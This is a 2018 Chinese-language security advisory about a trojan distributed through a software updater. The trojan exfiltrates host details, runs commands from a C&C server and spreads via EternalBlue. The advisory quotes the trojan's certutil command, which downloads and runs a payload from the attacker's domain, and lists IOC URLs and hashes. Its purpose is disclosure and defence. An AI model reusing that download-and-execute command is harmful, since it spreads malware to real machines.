利用「驅動人生」升級程序的惡意程序預警

原文作者：360核心安全團隊

0x00 概述

2018年12月14日下午，360互聯網安全中心監控到一批通過 「人生日曆」升級程序下發的下載器木馬，其具備遠程執行代碼功能，啟動後會將用戶計算機的詳細信息發往木馬伺服器，並接收遠程指令執行下一步操作。

同時該木馬還攜帶有永恆之藍漏洞攻擊組件，可通過永恆之藍漏洞攻擊區域網與互聯網中其它機器。

360安全衛士已在第一時間對該木馬進行了攔截查殺，並提交廠商處理。

360CERT在此發出預警，請用戶及時做好安全防護與病毒查殺工作。

0x01 技術細節分析

2018年12月14日14時，驅動人生旗下的「人生日曆」產品，通過其升級組件DTLUpg.exe，開始下發執行木馬程序

f79cb9d2893b254cc75dfb7f3e454a69.exe，18時開始木馬推送量開始擴大，到23時我們向廠商通報了發現的情況，下發停止。

截止12月14日21時，該木馬累計攻擊計算機超過5.7萬台（不包括漏洞攻擊情況，360安全衛士帶有永恆之藍漏洞免疫功能）。

該木馬程序執行後，會向系統安裝木馬服務Ddriver實現長期駐留，之後向伺服器haqo.net發送宿主機器的詳細信息，包括如下信息：

計算機名稱

操作系統版本

機器軟硬體信息等

之後接收伺服器返回的shellcode指令執行。

同時該木馬具有自升級，遠程下載文件執行，遠程創建服務等功能。

木馬在啟動後，會根據伺服器指令，下載一款永恆之藍漏洞利用工具，通過該漏洞利用工具，攻擊區域網與互聯網中其它計算機，攻擊成功後，使用certutil做跳板程序，向其它機器安裝該木馬（也可以安裝其它木馬，由雲端伺服器決定）。

certutil  -urlcache  -split   -f   hxxp://dl.haqo.net/dl.exe  c:install.exe&c:install.exe&……

目前該木馬的C&C仍然活躍，收到的更多指令在繼續分析中。

上述由360核心安全團隊提供分析。

0x02 修復方式與安全建議

及時使用360安全衛士進行病毒查殺（360安全衛士具備的永恆之藍漏洞免疫功能，可保護用戶免遭該木馬攻擊）

1、做好相關重要數據備份工作

2、加強系統安全工作，及時升級軟體與安裝操作系統補丁

3、伺服器暫時關閉不必要的埠（如135、139、445）

4、伺服器使用高強度密碼，切勿使用弱口令，防止黑客暴力破解

0x03 相關IOC

hxxp://p.abbny.com/im.png

hxxp://i.haqo.net/i.png

hxxp://dl.haqo.net/eb.exez

hxxp://dl.haqo.net/dl.exe

ackng.com

74e2a43b2b7c6e258b3a3fc2516c1235

2e9710a4b9cba3cd11e977af87570e3b

f79cb9d2893b254cc75dfb7f3e454a69

93a0b974bac0882780f4f1de41a65cfd

0x04 時間線

2018-12-14 360互聯網安全中心監測發現木馬

2018-12-15 360CERT && 360核心安全團隊發布預警

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！